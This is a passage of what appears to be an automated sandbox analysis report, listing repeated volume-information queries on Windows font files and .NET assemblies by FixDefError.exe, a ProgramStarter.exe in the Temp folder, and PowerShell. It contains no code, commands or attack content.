      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\FixDefError.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ProgramStarter.exe VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\ProgramStarter.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
